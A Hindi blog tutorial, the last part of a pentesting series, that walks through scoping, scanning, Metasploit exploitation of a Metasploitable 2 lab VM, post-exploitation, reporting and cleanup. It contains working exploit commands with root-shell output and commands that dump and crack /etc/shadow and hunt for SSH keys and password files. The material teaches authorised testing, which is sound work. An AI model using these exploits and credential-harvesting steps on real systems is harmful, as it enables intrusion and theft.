मेनू
होम लेख {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} परिचय मेरे साथ काम करें
Security operations center
सुरक्षा 8 मार्च, 2026 • 30 मिनट पढ़ें

पूर्ण ऑडिट: शुरू से अंत तक एक पूर्ण पेनेट्रेशन टेस्ट

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

साझा करें:
Lee Foropoulos

Lee Foropoulos

30 मिनट पढ़ें

Continue where you left off?
Text size:

Contents

हैकर का मार्ग: 5-भाग श्रृंखला

भाग 1: परिचयभाग 2: Flipper में महारतभाग 3: Kali की बुनियादभाग 4: एक्सप्लॉइटेशनभाग 5: पूर्ण ऑडिट

आपने यह श्रृंखला यह सोचते हुए शुरू की कि हैकर्स वास्तव में क्या करते हैं। आपने सीखा कि यह हुडी और हरे टेक्स्ट के बारे में नहीं है। यह व्यवस्थित समस्या-समाधान है। आपने बैज क्लोन किए, नेटवर्क मैप किए, handshakes कैप्चर किए और कमजोर मशीनों पर shells प्राप्त किए।

अब हम सब कुछ एक साथ जोड़ते हैं। यह लेख आपको एक काल्पनिक लक्ष्य के खिलाफ एक पूर्ण पेनेट्रेशन टेस्ट के माध्यम से ले जाता है। हर चरण, हर निर्णय, हर खोज, ठीक वैसे ही प्रलेखित जैसे एक पेशेवर करेगा।

परिदृश्य

क्लाइंट: Initech Labs (एक काल्पनिक छोटी टेक कंपनी)

दायरा: आंतरिक नेटवर्क पेनेट्रेशन टेस्ट

लक्ष्य: कमजोरियों की पहचान करना और संभावित व्यापार प्रभाव प्रदर्शित करना

आपका लक्ष्य: आपका अपना लैब नेटवर्क (Kali + Metasploitable 2 + कोई अन्य VM जो आपने सेटअप किया)

एक कॉफी बनाएं। यह मजेदार होने वाला है।

चरण 1: पूर्व-संलग्नता

कीबोर्ड छूने से पहले, पेशेवर पेंटेस्टर व्यापार पक्ष को संभालते हैं। इसे छोड़ दें, और आप पेंटेस्टर नहीं हैं। आप बस अपराध कर रहे हैं।

स्कोपिंग कॉल

एक वास्तविक संलग्नता में, आप क्लाइंट से कॉल करेंगे:

  • दायरे में क्या है? कौन से नेटवर्क, IP रेंज, एप्लिकेशन?
  • दायरे से बाहर क्या है? प्रोडक्शन सिस्टम? तृतीय-पक्ष सेवाएं?
  • टेस्टिंग विंडो? कब टेस्ट कर सकते हैं? केवल कार्य घंटे?
  • संपर्क बिंदु? कुछ टूटे तो किसे कॉल करें?
  • लक्ष्य? अनुपालन चेकबॉक्स या वास्तविक सुरक्षा सुधार?

आपकी लैब के लिए

दायरा: केवल आपका पृथक लैब नेटवर्क। दायरे से बाहर: बाकी सब कुछ। टेस्टिंग विंडो: जब चाहें। लक्ष्य: करके सीखना।

संलग्नता के नियम

वास्तविक संलग्नताओं में लिखित नियम होते हैं:

  • प्राधिकरण पत्र - हस्ताक्षरित दस्तावेज जो साबित करता है कि आपके पास अनुमति है
  • एस्केलेशन प्रक्रियाएं - अगर कुछ गंभीर मिले तो क्या करें
  • डेटा हैंडलिंग - संवेदनशील डेटा कैसे संभालें
  • सफाई आवश्यकताएं - समाप्त होने पर सभी टूल्स और बैकडोर हटाएं
  • रिपोर्ट की समयसीमा - अंतिम रिपोर्ट कब देनी है?

हमेशा लिखित अनुमति प्राप्त करें

"दोस्ताना" टेस्ट के लिए भी। एक हस्ताक्षरित ईमेल जो कहता है "आपको मेरे नेटवर्क को तारीख से तारीख तक टेस्ट करने की अनुमति है" एक सीखने के अनुभव और आपराधिक सजा के बीच का अंतर हो सकता है। इसे गंभीरता से लें।

चरण 2: रिकनाइसेंस

लक्ष्य के बारे में सब कुछ जानने का समय। वास्तविक संलग्नता में, इसमें OSINT शामिल होगा: Google खोज, LinkedIn प्रोफाइल, कंपनी वेबसाइट, DNS रिकॉर्ड। हमारी लैब के लिए, हम सीधे सक्रिय रिकनाइसेंस पर जाते हैं।

कदम 1: नेटवर्क खोज

पहला सवाल: इस नेटवर्क पर क्या है?

bash
1# अपनी नेटवर्क रेंज खोजें
2ip a | grep inet
3# कुछ ऐसा खोजें: inet 192.168.56.100/24
4
5# सभी लाइव होस्ट खोजें
6sudo nmap -sn 192.168.56.0/24 -oA discovery
7
8# परिणाम (उदाहरण):
9Nmap scan report for 192.168.56.1
10Host is up (0.00032s latency).
11Nmap scan report for 192.168.56.101
12Host is up (0.00089s latency).
13Nmap scan report for 192.168.56.102
14Host is up (0.00045s latency).

सब कुछ प्रलेखित करें:

text
1# Initech Labs - नेटवर्क खोज
2# तिथि: 2026-03-08
3# परीक्षक: आपका नाम
4
5192.168.56.1   - Gateway/Router
6192.168.56.101 - अज्ञात (जांच करनी है)
7192.168.56.102 - अज्ञात (जांच करनी है)

कदम 2: पोर्ट स्कैनिंग

अब गहराई में जाते हैं। कौन सी सेवाएं चल रही हैं?

bash
1# सेवा पहचान के साथ पूर्ण पोर्ट स्कैन
2sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
3
4# सीखने के दौरान तेज परिणामों के लिए:
5sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

Metasploitable 2 पर, आपको खजाना दिखेगा:

text
1PORT     STATE SERVICE     VERSION
221/tcp   open  ftp         vsftpd 2.3.4
322/tcp   open  ssh         OpenSSH 4.7p1
423/tcp   open  telnet      Linux telnetd
525/tcp   open  smtp        Postfix smtpd
680/tcp   open  http        Apache httpd 2.2.8
7139/tcp  open  netbios-ssn Samba smbd 3.X
8445/tcp  open  netbios-ssn Samba smbd 3.X
93306/tcp open  mysql       MySQL 5.0.51a
105432/tcp open  postgresql  PostgreSQL DB
11...

क्या एक्सपोजर है। नोट्स अपडेट करें:

text
1192.168.56.101 - Linux Server (Metasploitable)
2  - FTP (21): vsftpd 2.3.4       # ज्ञात बैकडोर!
3  - SSH (22): OpenSSH 4.7p1      # प्राचीन
4  - Telnet (23): सक्रिय           # 2026 में यह क्यों मौजूद है?
5  - HTTP (80): Apache 2.2.8      # वेब ऐप्स टेस्ट करने के लिए
6  - SMB (139/445): Samba 3.X     # संभावित सोने की खान
7  - MySQL (3306): 5.0.51a        # डेटाबेस एक्सेस?
8  - PostgreSQL (5432): सक्रिय    # एक और DB

कदम 3: कमजोरी पहचान

देखते हैं वास्तव में क्या एक्सप्लॉइट किया जा सकता है।

bash
1# कमजोरी स्क्रिप्ट चलाएं
2sudo nmap --script vuln -oA vuln_scan 192.168.56.101
3
4# Metasploit में विशिष्ट सेवाएं जांचें
5msfconsole
6msf6 > search vsftpd
7msf6 > search samba 3
8msf6 > search apache 2.2

vsftpd 2.3.4 बैकडोर तुरंत दिखता है। यह एक गारंटीड shell है। लेकिन एक अच्छा पेंटेस्टर पहली खोज पर नहीं रुकता। सब कुछ प्रलेखित करें।

ब्लिंकिंग नेटवर्क उपकरण के साथ सर्वर रूम
गहन रिकनाइसेंस एकल exploit चलाने से पहले पूरी हमले की सतह को मैप करता है। हर खुला पोर्ट और सेवा संस्करण आपके मूल्यांकन में एक डेटा पॉइंट बन जाता है।

चरण 3: एक्सप्लॉइटेशन

यहां चीजें रोमांचक होती हैं। हमारे पास कई संभावित प्रवेश बिंदु हैं। व्यवस्थित रूप से काम करें।

अटैक वेक्टर 1: FTP बैकडोर

bash
1msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
2msf6 exploit(...) > set RHOSTS 192.168.56.101
3msf6 exploit(...) > exploit
4
5[*] Banner: 220 (vsFTPd 2.3.4)
6[*] USER: 331 Please specify the password.
7[+] Backdoor service has been spawned
8[+] Command shell session 1 opened
9
10whoami
11root
12
13id
14uid=0(root) gid=0(root)

प्रलेखित खोज: FTP बैकडोर के माध्यम से Root shell प्राप्त। पहले स्कैन से पूर्ण समझौते तक का समय: लगभग 10 मिनट।

FTP बैकडोर के माध्यम से Root shell प्राप्त। पहले स्कैन से पूर्ण समझौते तक का समय: लगभग 10 मिनट।

लेकिन हम यहां नहीं रुकते। और क्या एक्सेस कर सकते हैं?

अटैक वेक्टर 2: Samba

bash
1background
2
3msf6 > use exploit/multi/samba/usermap_script
4msf6 exploit(...) > set RHOSTS 192.168.56.101
5msf6 exploit(...) > exploit
6
7[*] Command shell session 2 opened
8
9whoami
10root

एक अलग वेक्टर के माध्यम से एक और root shell। पूर्ण समझौते के दो स्वतंत्र रास्ते।

अटैक वेक्टर 3: वेब एप्लिकेशन

देखते हैं पोर्ट 80 पर क्या चल रहा है।

bash
1gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
2
3# परिणाम:
4/cgi-bin/     (Status: 403)
5/dav/         (Status: 301)
6/icons/       (Status: 301)
7/index        (Status: 200)
8/phpMyAdmin/  (Status: 301)
9/phpinfo      (Status: 200)
10/test/        (Status: 301)
11/twiki/       (Status: 301)
12
13nikto -h http://192.168.56.101

डिफॉल्ट क्रेडेंशियल्स वाला phpMyAdmin? जांचें:

text
1Username: root
2Password: (खाली)
3
4# एक्सेस मिल गया!

बिना पासवर्ड के डेटाबेस एडमिन एक्सेस। यहां से, हम सारा डेटा निकाल सकते हैं, रिकॉर्ड संशोधित कर सकते हैं या MySQL की फाइल ऑपरेशन का उपयोग करके web shell लिख सकते हैं।

अटैक वेक्टर 4: कमजोर SSH क्रेडेंशियल्स

bash
1msf6 > use auxiliary/scanner/ssh/ssh_login
2msf6 auxiliary(...) > set RHOSTS 192.168.56.101
3msf6 auxiliary(...) > set USERNAME msfadmin
4msf6 auxiliary(...) > set PASSWORD msfadmin
5msf6 auxiliary(...) > run
6
7[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

कमजोर क्रेडेंशियल्स SSH एक्सेस देते हैं। Root नहीं, लेकिन पोस्ट-एक्सप्लॉइटेशन में संभालेंगे।

चरण 4: पोस्ट-एक्सप्लॉइटेशन

हमारे पास एक्सेस है। अब क्या? एक वास्तविक पेनेट्रेशन टेस्ट व्यापार प्रभाव प्रदर्शित करता है।

क्रेडेंशियल हार्वेस्टिंग

bash
1cat /etc/shadow
2root:$1$xyz...truncated...:14889:0:99999:7:::
3msfadmin:$1$abc...truncated...:14889:0:99999:7:::
4user:$1$def...truncated...:14889:0:99999:7:::
5postgres:$1$ghi...truncated...:14889:0:99999:7:::
6
7cat /etc/passwd > /tmp/passwd.txt
8cat /etc/shadow > /tmp/shadow.txt
9
10unshadow passwd.txt shadow.txt > combined.txt
11john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

नेटवर्क रिकनाइसेंस (अंदर से)

bash
1ifconfig
2route -n
3cat /etc/hosts
4arp -a
5
6netstat -tulpn
7ss -tulpn
8
9find / -name "id_rsa" 2>/dev/null
10find / -name "authorized_keys" 2>/dev/null

संवेदनशील डेटा की खोज

bash
1find / -name "*.conf" 2>/dev/null | head -20
2find / -name "*.sql" 2>/dev/null
3find / -name "*.bak" 2>/dev/null
4find / -name "*password*" 2>/dev/null
5
6cat /var/www/*/config.php 2>/dev/null
7cat /etc/mysql/my.cnf
8
9mysql -u root -p
10mysql> SHOW DATABASES;
11mysql> SELECT * FROM mysql.user;

प्रिविलेज एस्केलेशन (msfadmin से)

msfadmin के रूप में SSH लॉगिन याद है? भाग 4 में सीखे गए का उपयोग करके root तक बढ़ें।

bash
1ssh [email protected]
2sudo -l
3find / -perm -4000 2>/dev/null
4cat /etc/crontab
साइबर सुरक्षा उपकरणों के साथ डेस्क पर काम करता पेशेवर
पोस्ट-एक्सप्लॉइटेशन वास्तविक व्यापार प्रभाव प्रदर्शित करता है। कमजोरी स्कैन और पेनेट्रेशन टेस्ट के बीच का अंतर यह साबित करना है कि एक हमलावर वास्तव में एक्सेस के साथ क्या कर सकता है।

चरण 5: प्रलेखन और निष्कर्ष

रिपोर्ट के बिना टेस्ट बेकार है। यह पेशेवरों को script kiddies से अलग करता है।

निष्कर्षों का सारांश

"Initech Labs" नेटवर्क पर हमने जो पाया, वास्तविक रिपोर्ट के प्रारूप में:

गंभीर: FTP सेवा बैकडोर (CVE-2011-2523)

प्रभावित सिस्टम: 192.168.56.101

जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन

प्रमाण: 60 सेकंड से कम में पूर्ण root shell प्राप्त

सिफारिश: vsftpd को तुरंत वर्तमान संस्करण में अपडेट करें या FTP सेवा पूरी तरह बंद करें।

गंभीर: Samba रिमोट कोड निष्पादन

प्रभावित सिस्टम: 192.168.56.101

जोखिम: root के रूप में बिना प्रमाणीकरण रिमोट कोड निष्पादन

प्रमाण: usermap_script exploit के माध्यम से पूर्ण root shell प्राप्त

सिफारिश: Samba को वर्तमान संस्करण में अपडेट करें। SMB एक्सेस केवल आवश्यक सिस्टम तक सीमित करें।

उच्च: बिना पासवर्ड MySQL Root एक्सेस

प्रभावित सिस्टम: 192.168.56.101

जोखिम: पूर्ण डेटाबेस समझौता, डेटा चोरी, web shell परिनियोजन

प्रमाण: phpMyAdmin के माध्यम से खाली पासवर्ड से root के रूप में लॉगिन

सिफारिश: मजबूत root पासवर्ड सेट करें। phpMyAdmin एक्सेस प्रतिबंधित करें।

उच्च: कमजोर SSH क्रेडेंशियल्स

प्रभावित सिस्टम: 192.168.56.101

जोखिम: प्रमाणित एक्सेस जो प्रिविलेज एस्केलेशन की ओर ले जाता है

प्रमाण: msfadmin:msfadmin सफलतापूर्वक प्रमाणित

सिफारिश: मजबूत पासवर्ड नीति लागू करें। SSH कुंजी-आधारित प्रमाणीकरण लागू करें।

मध्यम: Telnet सेवा सक्षम

प्रभावित सिस्टम: 192.168.56.101

जोखिम: क्रेडेंशियल्स सादे पाठ में प्रेषित

सिफारिश: Telnet बंद करें। सभी रिमोट प्रशासन के लिए SSH का उपयोग करें।

निम्न: उजागर phpinfo() पेज

प्रभावित सिस्टम: 192.168.56.101

सिफारिश: phpinfo पेज हटाएं या एक्सेस प्रतिबंधित करें।

कार्यकारी सारांश

कार्यकारी सारांश

Initech Labs के आंतरिक नेटवर्क के पेनेट्रेशन टेस्ट के दौरान, सुरक्षा टीम ने मूल्यांकन शुरू करने के 10 मिनट के भीतर मुख्य सर्वर का पूर्ण प्रशासनिक नियंत्रण प्राप्त किया।

प्रमुख निष्कर्ष:

10 min
बिना पैच सेवाओं वाले सर्वर पर पहले स्कैन से पूर्ण root समझौते तक का समय।
  • 2 गंभीर कमजोरियां जो तुरंत रिमोट टेकओवर की अनुमति देती हैं
  • 2 उच्च-गंभीरता मुद्दे जो डेटाबेस और उपयोगकर्ता क्रेडेंशियल्स उजागर करते हैं
  • कई मध्यम और निम्न निष्कर्ष जो प्रणालीगत सुरक्षा अंतराल दर्शाते हैं

निष्कर्ष: बुनियादी कौशल वाला हमलावर इस सिस्टम को मिनटों में पूरी तरह समझौता कर सकता है। सभी गंभीर और उच्च निष्कर्षों के लिए तत्काल उपचार आवश्यक है।

चरण 6: सफाई और समापन

एक पेशेवर पेंटेस्टर वातावरण को ठीक वैसे ही छोड़ता है जैसा उसने पाया।

bash
1msf6 > sessions -l
2msf6 > sessions -K
3
4rm /tmp/linpeas.sh
5rm /tmp/*.txt
6userdel testuser
7rm /home/*/.ssh/authorized_keys

वास्तविक संलग्नता में, आप यह भी करेंगे:

  • टेस्टिंग के दौरान अपलोड किए गए सभी टूल्स हटाएं
  • वातावरण में किए गए किसी भी बदलाव को प्रलेखित करें
  • निकाले गए डेटा के hashes/checksums प्रदान करें
  • रिपोर्ट वितरण के बाद सभी क्लाइंट डेटा सुरक्षित रूप से हटाएं

पूर्ण कार्यप्रणाली चेकलिस्ट

किसी भी पेनेट्रेशन टेस्ट के लिए आपका पुन: प्रयोज्य वर्कफ़्लो:

पेनेट्रेशन टेस्ट कार्यप्रणाली

  1. पूर्व-संलग्नता
    • दायरा और संलग्नता नियम परिभाषित करें
    • लिखित प्राधिकरण प्राप्त करें
    • संचार चैनल स्थापित करें
    • परीक्षण वातावरण सेटअप करें
  2. रिकनाइसेंस
    • नेटवर्क खोज (होस्ट एन्यूमरेशन)
    • पोर्ट स्कैनिंग और सेवा पहचान
    • कमजोरी स्कैनिंग
    • वेब एप्लिकेशन एन्यूमरेशन
    • सब कुछ प्रलेखित करें
  3. एक्सप्लॉइटेशन
    • कमजोरियों को मान्य करें (स्कैनर पर आंख बंद करके भरोसा न करें)
    • पुष्टि की गई कमजोरियों का शोषण करें
    • हर सफल समझौते को प्रलेखित करें
    • साक्ष्य कैप्चर करें (स्क्रीनशॉट, लॉग)
  4. पोस्ट-एक्सप्लॉइटेशन
    • समझौता किए गए सिस्टम की गणना करें
    • क्रेडेंशियल्स इकट्ठा करें
    • संवेदनशील डेटा की पहचान करें
    • प्रिविलेज एस्केलेशन का प्रयास करें
    • लेटरल मूवमेंट के अवसर खोजें
  5. रिपोर्टिंग
    • कार्यकारी सारांश लिखें (व्यापार प्रभाव)
    • सभी निष्कर्ष साक्ष्य के साथ प्रलेखित करें
    • उपचार सिफारिशें प्रदान करें
    • IT टीमों के लिए तकनीकी विवरण शामिल करें
  6. सफाई
    • सभी टूल्स और आर्टिफैक्ट्स हटाएं
    • सभी सत्र और बैकडोर बंद करें
    • वातावरण बदलाव प्रलेखित करें
    • क्लाइंट डेटा सुरक्षित रूप से संभालें
पूर्ण ऑडिट कार्य योजना 0/6

आगे क्या: आपका मार्ग

आपने हैकर का मार्ग पूरा कर लिया। आप "हैकिंग का मतलब क्या है?" से पूर्ण पेनेट्रेशन टेस्ट करने तक पहुंचे। यह वास्तव में प्रभावशाली है।

लेकिन यह बस शुरुआत है। यहां से आगे जाएं:

अभ्यास प्लेटफॉर्म

  • Hack The Box - अभ्यास के लिए यथार्थवादी मशीनें। "आसान" रिटायर्ड बॉक्स से शुरू करें।
  • TryHackMe - निर्देशित सीखने के रास्ते।
  • VulnHub - डाउनलोड और स्थानीय अभ्यास के लिए मुफ्त कमजोर VMs।
  • PentesterLab - वेब एप्लिकेशन सुरक्षा पर केंद्रित।

प्रमाणपत्र (यदि चाहें)

  • eJPT - उत्कृष्ट शुरुआती बिंदु, व्यावहारिक परीक्षा
  • OSCP - उद्योग मानक, कठिन लेकिन सम्मानित
  • PNPT - आधुनिक, व्यावहारिक, रिपोर्ट लेखन शामिल
  • CEH - कॉर्पोरेट आवश्यकताओं के लिए, कम व्यावहारिक

विशेषज्ञताएं

  • वेब एप्लिकेशन सुरक्षा - OWASP, Burp Suite, SQL injection, XSS
  • Active Directory - अधिकांश कॉर्पोरेट वातावरण इसका उपयोग करते हैं
  • क्लाउड सुरक्षा - AWS, Azure, GCP पेंटेस्टिंग
  • मोबाइल सुरक्षा - Android/iOS एप्लिकेशन परीक्षण
  • Red Teaming - पूर्ण विरोधी सिमुलेशन, भौतिक + डिजिटल
  • रिवर्स इंजीनियरिंग - मालवेयर विश्लेषण, एक्सप्लॉइट विकास

अपनी होम लैब बनाएं

सबसे अच्छे पेंटेस्टर्स के पास विस्तृत होम लैब होती हैं। सरल शुरू करें:

  • Active Directory के साथ Windows Server जोड़ें
  • Domain controller सेटअप करें
  • कमजोर वेब एप्लिकेशन परिनियोजित करें (DVWA, bWAPP, WebGoat)
  • कई सेगमेंट के साथ नेटवर्क बनाएं
  • रक्षक के दृष्टिकोण से हमले देखने के लिए HoneyAegis जोड़ें

हैकर का मार्ग: पूर्ण

आपने यह कर दिया। सभी पांच भाग, जिज्ञासु से सक्षम तक।

भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियाद भाग 4: एक्सप्लॉइटेशन भाग 5: पूर्ण ऑडिट

श्रृंखला पूर्ण - आपकी यात्रा

भाग 1: आपने सीखा कि हैकिंग वास्तव में क्या है और Flipper Zero के साथ अपनी पहली जीत हासिल की

भाग 2: आपने हर Flipper प्रोटोकॉल में महारत हासिल की: Sub-GHz, RFID, NFC, BadUSB, GPIO

भाग 3: आपने अपनी Kali लैब बनाई, nmap सीखा और WiFi handshakes कैप्चर किए

भाग 4: आपने Metasploit, एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन और pivoting में महारत हासिल की

भाग 5: आपने सब कुछ एक पूर्ण पेनेट्रेशन टेस्टिंग कार्यप्रणाली में जोड़ दिया

सुरक्षा एक गंतव्य नहीं है। यह एक अभ्यास है। उपकरण बदलेंगे, कमजोरियां विकसित होंगी, लेकिन कार्यप्रणाली वही रहती है। सब कुछ पर सवाल उठाएं। सब कुछ प्रलेखित करें। सीखना कभी बंद न करें।

दूसरी तरफ आपका स्वागत है।

  • Lee
How was this article?

साझा करें

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Koi bhi post na chookeN

Naye lekh prakashit hone par suchna prapt kareN. Email ki zaroorat nahiN.

Nayi post hone par site par ek banner dikhega, aur browser notification bhi agar aap anumati dete hain.

Keval browser soochnaeN. Koi spam nahiN.

0 / 0